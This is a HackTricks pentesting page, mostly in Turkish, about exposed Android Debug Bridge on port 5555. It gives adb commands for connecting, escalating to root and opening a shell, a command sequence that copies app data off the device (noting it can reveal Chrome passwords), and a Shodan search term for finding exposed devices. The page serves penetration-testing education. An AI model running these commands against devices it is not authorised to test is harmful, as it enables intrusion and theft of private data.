hacktricks/network-services-pentesting/5555-android-debug-bridge.md

4 KiB
Raw Blame History

5555 - Android Debug Bridge

{% hint style="success" %} Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks
{% endhint %}

Temel Bilgiler

From the docs:

Android Debug Bridge (adb), bir cihazla iletişim kurmanıza olanak tanıyan çok yönlü bir komut satırı aracıdır. adb komutu, uygulamaları yükleme ve hata ayıklama gibi çeşitli cihaz eylemlerini kolaylaştırır ve bir cihazda çeşitli komutlar çalıştırmak için kullanabileceğiniz Unix kabuğuna erişim sağlar.

Varsayılan port: 5555.

PORT     STATE SERVICE VERSION
5555/tcp open  adb     Android Debug Bridge device (name: msm8909; model: N3; device: msm8909)

Connect

Eğer bir cihazın bir portunda ADB hizmetini bulur ve ona bağlanabilirseniz, sistemin içinde bir shell alabilirsiniz:

adb connect 10.10.10.10
adb root # Try to escalate to root
adb shell

Daha fazla ADB komutu için aşağıdaki sayfayı kontrol edin:

{% content-ref url="../mobile-pentesting/android-app-pentesting/adb-commands.md" %} adb-commands.md {% endcontent-ref %}

Uygulama verilerini dökme

Bir uygulamanın verilerini tamamen indirmek için şunları yapabilirsiniz:

# From a root console
chmod 777 /data/data/com.package
cp -r /data/data/com.package /sdcard Note: Using ADB attacker cannot obtain data directly by using command " adb pull /data/data/com.package". He is compulsorily required to move data to Internal storage and then he can pull that data.
adb pull "/sdcard/com.package"

Bu hileyi chrome şifreleri gibi hassas bilgileri almak için kullanabilirsiniz. Bununla ilgili daha fazla bilgi için sağlanan referanslardaki bilgileri kontrol edin burada.

Shodan

  • android debug bridge

{% hint style="success" %} AWS Hacking'i öğrenin ve pratik yapın:HackTricks Training AWS Red Team Expert (ARTE)
GCP Hacking'i öğrenin ve pratik yapın: HackTricks Training GCP Red Team Expert (GRTE)

HackTricks'i Destekleyin
{% endhint %}